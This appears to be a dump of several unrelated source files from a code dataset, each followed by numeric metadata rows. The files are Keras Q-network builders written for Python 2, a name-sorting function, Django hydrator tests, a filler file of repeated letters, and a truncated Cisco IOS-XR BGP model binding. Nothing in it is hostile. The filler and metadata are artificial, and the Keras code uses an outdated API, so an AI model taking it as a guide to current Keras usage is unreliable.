    # linear with a separate LeakyReLU(alpha=0.01) activation layer.
    model = Sequential()
    model.add(Dense(128, activation='linear', input_shape=input_shape,
                    init=w_init, W_regularizer=l2(regularization)))
    model.add(LeakyReLU(alpha=0.01))
    model.add(Dense(128, activation='linear', init=w_init,
                    W_regularizer=l2(regularization)))
    model.add(LeakyReLU(alpha=0.01))
    model.add(Dense(128, activation='linear', init=w_init,
                    W_regularizer=l2(regularization)))
    model.add(LeakyReLU(alpha=0.01))
    # Output layer: one linear unit per valid action.
    model.add(Dense(len(policy.valid_actions), init=w_init,
                    W_regularizer=l2(regularization)))
    # Compile model
    model.compile(optimizer=optim, loss='mse')
    return model, input_shape
def get_conv_nn(policy, optim, w_init="zero", regularization=1E-4):
    # Return an conv_nn Keras model
    #
    # Build a convolutional estimator: three conv layers, one 512-unit
    # dense layer, and one linear output unit per valid action.
    #   policy: provides `state_dimension` (2-D input shape) and
    #           `valid_actions` (output width).
    #   optim: Keras optimizer passed to model.compile.
    #   w_init: weight-initializer name (legacy Keras `init=` argument).
    #   regularization: accepted but NOT applied to any layer here --
    #       TODO(review) confirm whether that is intentional (get_std_nn
    #       does use it).
    # Returns a tuple (compiled model, input_shape).
    #
    # NOTE(review): Python 2 print statement and Keras 1.x API
    # (`init=`, `subsample=`, `border_mode=`) -- requires Python 2 and
    # an old Keras release.
    from keras.models import Sequential
    from keras.layers import Dense, Convolution2D, Flatten
    from keras.layers.advanced_activations import LeakyReLU

    input_shape = policy.state_dimension
    print "Conv NN input {}".format(input_shape)

    # Model Definition: each conv layer is linear with a separate
    # LeakyReLU(alpha=0.01); filter counts/strides shrink the spatial dims.
    model = Sequential()
    model.add(Convolution2D(32, 6, 6, subsample=(3, 3), init=w_init,
                            activation='linear', border_mode='valid', input_shape=input_shape))
    model.add(LeakyReLU(alpha=0.01))
    model.add(Convolution2D(64, 4, 4, subsample=(2, 2), init=w_init,
                            activation='linear', border_mode='valid'))
    model.add(LeakyReLU(alpha=0.01))
    model.add(Convolution2D(64, 3, 3, subsample=(1, 1), init=w_init,
                            activation='linear', border_mode='valid'))
    model.add(LeakyReLU(alpha=0.01))
    model.add(Flatten())
    model.add(Dense(512, init=w_init, activation="linear"))
    model.add(LeakyReLU(alpha=0.01))
    # Output layer: one linear unit per valid action.
    model.add(Dense(len(policy.valid_actions), init=w_init))
    # Compile Model
    model.compile(optimizer=optim, loss='mse')
    return model, input_shape
def get_conv_nn_plus(policy, optim, w_init="zero", regularization=1E-4):
    # Return an conv_nn Keras model
    #
    # Wider variant of get_conv_nn: doubled filter counts (64/128/128)
    # and a 1024-unit dense layer; otherwise the same architecture.
    #   policy: provides `state_dimension` (2-D input shape) and
    #           `valid_actions` (output width).
    #   optim: Keras optimizer passed to model.compile.
    #   w_init: weight-initializer name (legacy Keras `init=` argument).
    #   regularization: accepted but NOT applied to any layer here --
    #       TODO(review) confirm whether that is intentional.
    # Returns a tuple (compiled model, input_shape).
    #
    # NOTE(review): Python 2 print statement and Keras 1.x API -- requires
    # Python 2 and an old Keras release.
    from keras.models import Sequential
    from keras.layers import Dense, Convolution2D, Flatten
    from keras.layers.advanced_activations import LeakyReLU

    input_shape = policy.state_dimension
    print "Conv NN input {}".format(input_shape)

    # Model Definition: each conv layer is linear with a separate
    # LeakyReLU(alpha=0.01) activation layer.
    model = Sequential()
    model.add(Convolution2D(64, 6, 6, subsample=(3, 3), init=w_init,
                            activation='linear', border_mode='valid', input_shape=input_shape))
    model.add(LeakyReLU(alpha=0.01))
    model.add(Convolution2D(128, 4, 4, subsample=(2, 2), init=w_init,
                            activation='linear', border_mode='valid'))
    model.add(LeakyReLU(alpha=0.01))
    model.add(Convolution2D(128, 3, 3, subsample=(1, 1), init=w_init,
                            activation='linear', border_mode='valid'))
    model.add(LeakyReLU(alpha=0.01))
    model.add(Flatten())
    model.add(Dense(1024, init=w_init, activation="linear"))
    model.add(LeakyReLU(alpha=0.01))
    # Output layer: one linear unit per valid action.
    model.add(Dense(len(policy.valid_actions), init=w_init))
    # Compile Model
    model.compile(optimizer=optim, loss='mse')
    return model, input_shape
| 36.515789
| 81
| 0.689536
| 472
| 3,469
| 4.940678
| 0.141949
| 0.092624
| 0.054031
| 0.103774
| 0.958405
| 0.958405
| 0.931818
| 0.919811
| 0.903516
| 0.903516
| 0
| 0.037311
| 0.181032
| 3,469
| 94
| 82
| 36.904255
| 0.783527
| 0.057077
| 0
| 0.734375
| 0
| 0
| 0.045692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.15625
| null | null | 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
409c28b48d82474c126683dd3387a73b0c9aacd2
| 194
|
py
|
Python
|
pystrings/lineup_students/__init__.py
|
JASTYN/pythonmaster
|
46638ab09d28b65ce5431cd0759fe6df272fb85d
|
[
"Apache-2.0",
"MIT"
] | 3
|
2017-05-02T10:28:13.000Z
|
2019-02-06T09:10:11.000Z
|
pystrings/lineup_students/__init__.py
|
JASTYN/pythonmaster
|
46638ab09d28b65ce5431cd0759fe6df272fb85d
|
[
"Apache-2.0",
"MIT"
] | 2
|
2017-06-21T20:39:14.000Z
|
2020-02-25T10:28:57.000Z
|
pystrings/lineup_students/__init__.py
|
JASTYN/pythonmaster
|
46638ab09d28b65ce5431cd0759fe6df272fb85d
|
[
"Apache-2.0",
"MIT"
] | 2
|
2016-07-29T04:35:22.000Z
|
2017-01-18T17:05:36.000Z
|
def lineup_students(string):
    """Order the whitespace-separated names in *string* tallest first.

    Longer names come first; equal-length names are ordered
    reverse-alphabetically. Returns a new list of names.
    """
    names = string.split()
    names.sort(key=lambda name: (len(name), name), reverse=True)
    return names
| 38.8
| 88
| 0.685567
| 31
| 194
| 4.225806
| 0.451613
| 0.21374
| 0.21374
| 0.229008
| 0.473282
| 0.473282
| 0.473282
| 0.473282
| 0.473282
| 0
| 0
| 0
| 0.128866
| 194
| 4
| 89
| 48.5
| 0.775148
| 0.443299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
40a9cf7f2a478c74c6e767c554c948cc9a9490a2
| 4,184
|
py
|
Python
|
misago/conf/tests/test_hydrators.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | 1
|
2017-07-25T03:04:36.000Z
|
2017-07-25T03:04:36.000Z
|
misago/conf/tests/test_hydrators.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
misago/conf/tests/test_hydrators.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from misago.conf.hydrators import dehydrate_value, hydrate_value
from misago.conf.models import Setting
class HydratorsTests(TestCase):
    """Round-trip tests for the misago.conf hydrate/dehydrate helpers.

    Each test dehydrates a "wet" Python value to its stored ("dry") form
    and asserts that hydrating the dry form yields the original value.
    """

    def test_hydrate_dehydrate_string(self):
        """string value is correctly hydrated and dehydrated"""
        wet_value = 'Ni!'
        dry_value = dehydrate_value('string', wet_value)
        self.assertEqual(hydrate_value('string', dry_value), wet_value)

    def test_hydrate_dehydrate_bool(self):
        """bool values are correctly hydrated and dehydrated"""
        # Both truth values are exercised so neither maps onto the other.
        wet_value = True
        dry_value = dehydrate_value('bool', wet_value)
        self.assertEqual(hydrate_value('bool', dry_value), wet_value)

        wet_value = False
        dry_value = dehydrate_value('bool', wet_value)
        self.assertEqual(hydrate_value('bool', dry_value), wet_value)

    def test_hydrate_dehydrate_int(self):
        """int value is correctly hydrated and dehydrated"""
        wet_value = 9001
        dry_value = dehydrate_value('int', wet_value)
        self.assertEqual(hydrate_value('int', dry_value), wet_value)

    def test_hydrate_dehydrate_list(self):
        """list is correctly hydrated and dehydrated"""
        wet_value = ['foxtrot', 'uniform', 'hotel']
        dry_value = dehydrate_value('list', wet_value)
        self.assertEqual(hydrate_value('list', dry_value), wet_value)

    def test_hydrate_dehydrate_empty_list(self):
        """empty list is correctly hydrated and dehydrated"""
        # Edge case: an empty list must survive the round trip too.
        wet_value = []
        dry_value = dehydrate_value('list', wet_value)
        self.assertEqual(hydrate_value('list', dry_value), wet_value)

    def test_value_error(self):
        """unsupported type raises ValueError"""
        # Both directions must reject an unknown python_type name.
        with self.assertRaises(ValueError):
            hydrate_value('eric', None)

        with self.assertRaises(ValueError):
            dehydrate_value('eric', None)
class HydratorsModelTests(TestCase):
    """Tests that the Setting model's value property (de)hydrates.

    Each test assigns a "wet" value to `setting.value` and asserts that
    both the hydrated `value` and the stored `dry_value` match what the
    hydrator helpers produce for the setting's python_type.
    """

    def test_hydrate_dehydrate_string(self):
        """string value is correctly hydrated and dehydrated in model"""
        setting = Setting(python_type='string')

        wet_value = 'Lorem Ipsum'
        dry_value = dehydrate_value(setting.python_type, wet_value)

        setting.value = wet_value
        self.assertEqual(setting.value, wet_value)
        self.assertEqual(setting.dry_value, dry_value)

    def test_hydrate_dehydrate_bool(self):
        """bool values are correctly hydrated and dehydrated in model"""
        setting = Setting(python_type='bool')

        # Both truth values are exercised so neither maps onto the other.
        wet_value = True
        dry_value = dehydrate_value(setting.python_type, wet_value)

        setting.value = wet_value
        self.assertEqual(setting.value, wet_value)
        self.assertEqual(setting.dry_value, dry_value)

        wet_value = False
        dry_value = dehydrate_value(setting.python_type, wet_value)

        setting.value = wet_value
        self.assertEqual(setting.value, wet_value)
        self.assertEqual(setting.dry_value, dry_value)

    def test_hydrate_dehydrate_int(self):
        """int value is correctly hydrated and dehydrated in model"""
        setting = Setting(python_type='int')

        wet_value = 9001
        dry_value = dehydrate_value(setting.python_type, wet_value)

        setting.value = wet_value
        self.assertEqual(setting.value, wet_value)
        self.assertEqual(setting.dry_value, dry_value)

    def test_hydrate_dehydrate_list(self):
        """list is correctly hydrated and dehydrated in model"""
        setting = Setting(python_type='list')

        wet_value = ['Lorem', 'Ipsum', 'Dolor', 'Met']
        dry_value = dehydrate_value(setting.python_type, wet_value)

        setting.value = wet_value
        self.assertEqual(setting.value, wet_value)
        self.assertEqual(setting.dry_value, dry_value)

    def test_hydrate_dehydrate_empty_list(self):
        """empty list is correctly hydrated and dehydrated in model"""
        setting = Setting(python_type='list')

        # Edge case: an empty list must survive the round trip too.
        wet_value = []
        dry_value = dehydrate_value(setting.python_type, wet_value)

        setting.value = wet_value
        self.assertEqual(setting.value, wet_value)
        self.assertEqual(setting.dry_value, dry_value)
| 37.026549
| 72
| 0.686185
| 508
| 4,184
| 5.377953
| 0.110236
| 0.122987
| 0.095168
| 0.151537
| 0.847731
| 0.847731
| 0.822108
| 0.799414
| 0.770132
| 0.770132
| 0
| 0.002449
| 0.219407
| 4,184
| 112
| 73
| 37.357143
| 0.834048
| 0.13217
| 0
| 0.739726
| 0
| 0
| 0.036364
| 0
| 0
| 0
| 0
| 0
| 0.273973
| 1
| 0.150685
| false
| 0
| 0.041096
| 0
| 0.219178
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40abb3ad746369194537416d8bf7b773d4cf9a79
| 1,772
|
py
|
Python
|
test/integration/CommentDocTag/giant summary.py
|
HighSchoolHacking/GLS-Draft
|
9e418b6290e7c8e3f2da87668784bdba1cde5a76
|
[
"MIT"
] | 30
|
2019-10-29T12:47:50.000Z
|
2022-02-12T06:41:39.000Z
|
test/integration/CommentDocTag/giant summary.py
|
HighSchoolHacking/GLS-Draft
|
9e418b6290e7c8e3f2da87668784bdba1cde5a76
|
[
"MIT"
] | 247
|
2017-09-21T17:11:18.000Z
|
2019-10-08T12:59:07.000Z
|
test/integration/CommentDocTag/giant summary.py
|
HighSchoolHacking/GLS-Draft
|
9e418b6290e7c8e3f2da87668784bdba1cde5a76
|
[
"MIT"
] | 17
|
2017-10-01T16:53:20.000Z
|
2018-11-28T07:20:35.000Z
|
#
aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq
rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh
iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy
zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp
qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg
hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx
yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo
ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff
ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www
xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn
ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee
fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv
www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm
nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd
eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu
vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk lll
mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc
ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt
uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj kkk
lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa bbb
ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr sss
ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii jjj
kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz aaa
bbb ccc ddd eee fff ggg hhh iii jjj kkk lll mmm nnn ooo ppp qqq rrr
sss ttt uuu vvv www xxx yyy zzz aaa bbb ccc ddd eee fff ggg hhh iii
jjj kkk lll mmm nnn ooo ppp qqq rrr sss ttt uuu vvv www xxx yyy zzz
#
| 61.103448
| 67
| 0.748307
| 442
| 1,772
| 3
| 0.058824
| 0.076923
| 0.115385
| 0.153846
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.250564
| 1,772
| 28
| 68
| 63.285714
| 0.998494
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40bb224e2ca9696f3b12fee38d99b8fb0c64b840
| 740,635
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_bgp_oc_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_bgp_oc_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_bgp_oc_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_ipv4_bgp_oc_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR ipv4\-bgp\-oc package operational data.
This module contains definitions
for the following management objects\:
oc\-bgp\: OC\-BGP operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class BgpOcAfi(Enum):
"""
BgpOcAfi (Enum Class)
BGP Address family
.. data:: ipv4 = 0
IPv4 unicast
.. data:: ipv6 = 5
IPv6 unicast
"""
ipv4 = Enum.YLeaf(0, "ipv4")
ipv6 = Enum.YLeaf(5, "ipv6")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['BgpOcAfi']
class BgpOcInvalidRouteReason(Enum):
"""
BgpOcInvalidRouteReason (Enum Class)
Invalid route reason
.. data:: valid_route = 1
Valid route
.. data:: invalid_clsuter_loop = 2
ClusterLoop
.. data:: invalid_as_path_loop = 3
AsPathLoop
.. data:: invalid_origin_at_or_id = 4
OriginatorID
.. data:: invalid_as_confed_loop = 5
ASConfedLoop
"""
valid_route = Enum.YLeaf(1, "valid-route")
invalid_clsuter_loop = Enum.YLeaf(2, "invalid-clsuter-loop")
invalid_as_path_loop = Enum.YLeaf(3, "invalid-as-path-loop")
invalid_origin_at_or_id = Enum.YLeaf(4, "invalid-origin-at-or-id")
invalid_as_confed_loop = Enum.YLeaf(5, "invalid-as-confed-loop")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['BgpOcInvalidRouteReason']
class BgpOcOriginAttr(Enum):
"""
BgpOcOriginAttr (Enum Class)
Origin Type
.. data:: igp = 0
IGP
.. data:: egp = 1
EGP
.. data:: incomplete = 2
Incomplete
"""
igp = Enum.YLeaf(0, "igp")
egp = Enum.YLeaf(1, "egp")
incomplete = Enum.YLeaf(2, "incomplete")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['BgpOcOriginAttr']
class OcBgp(_Entity_):
"""
OC\-BGP operational data
.. attribute:: bgp_rib
BGP\-RIB operational data
**type**\: :py:class:`BgpRib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp, self).__init__()
self._top_entity = None
self.yang_name = "oc-bgp"
self.yang_parent_name = "Cisco-IOS-XR-ipv4-bgp-oc-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("bgp-rib", ("bgp_rib", OcBgp.BgpRib))])
self._leafs = OrderedDict()
self.bgp_rib = OcBgp.BgpRib()
self.bgp_rib.parent = self
self._children_name_map["bgp_rib"] = "bgp-rib"
self._segment_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp, [], name, value)
class BgpRib(_Entity_):
"""
BGP\-RIB operational data
.. attribute:: afi_safi_table
AFI\-SAFIs information
**type**\: :py:class:`AfiSafiTable <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib, self).__init__()
self.yang_name = "bgp-rib"
self.yang_parent_name = "oc-bgp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("afi-safi-table", ("afi_safi_table", OcBgp.BgpRib.AfiSafiTable))])
self._leafs = OrderedDict()
self.afi_safi_table = OcBgp.BgpRib.AfiSafiTable()
self.afi_safi_table.parent = self
self._children_name_map["afi_safi_table"] = "afi-safi-table"
self._segment_path = lambda: "bgp-rib"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib, [], name, value)
class AfiSafiTable(_Entity_):
"""
AFI\-SAFIs information
.. attribute:: ipv4_unicast
IPv4 Unicast
**type**\: :py:class:`Ipv4Unicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast>`
**config**\: False
.. attribute:: ipv6_unicast
IPv6 Unicast
**type**\: :py:class:`Ipv6Unicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable, self).__init__()
self.yang_name = "afi-safi-table"
self.yang_parent_name = "bgp-rib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ipv4-unicast", ("ipv4_unicast", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast)), ("ipv6-unicast", ("ipv6_unicast", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast))])
self._leafs = OrderedDict()
self.ipv4_unicast = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast()
self.ipv4_unicast.parent = self
self._children_name_map["ipv4_unicast"] = "ipv4-unicast"
self.ipv6_unicast = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast()
self.ipv6_unicast.parent = self
self._children_name_map["ipv6_unicast"] = "ipv6-unicast"
self._segment_path = lambda: "afi-safi-table"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable, [], name, value)
class Ipv4Unicast(_Entity_):
"""
IPv4 Unicast
.. attribute:: loc_rib
Local rib route table
**type**\: :py:class:`LocRib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib>`
**config**\: False
.. attribute:: open_config_neighbors
Neighbor list
**type**\: :py:class:`OpenConfigNeighbors <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast, self).__init__()
self.yang_name = "ipv4-unicast"
self.yang_parent_name = "afi-safi-table"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("loc-rib", ("loc_rib", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib)), ("open-config-neighbors", ("open_config_neighbors", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors))])
self._leafs = OrderedDict()
self.loc_rib = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib()
self.loc_rib.parent = self
self._children_name_map["loc_rib"] = "loc-rib"
self.open_config_neighbors = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors()
self.open_config_neighbors.parent = self
self._children_name_map["open_config_neighbors"] = "open-config-neighbors"
self._segment_path = lambda: "ipv4-unicast"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast, [], name, value)
class LocRib(_Entity_):
"""
Local rib route table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib, self).__init__()
self.yang_name = "loc-rib"
self.yang_parent_name = "ipv4-unicast"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "loc-rib"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "loc-rib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv4-unicast/loc-rib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.LocRib.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
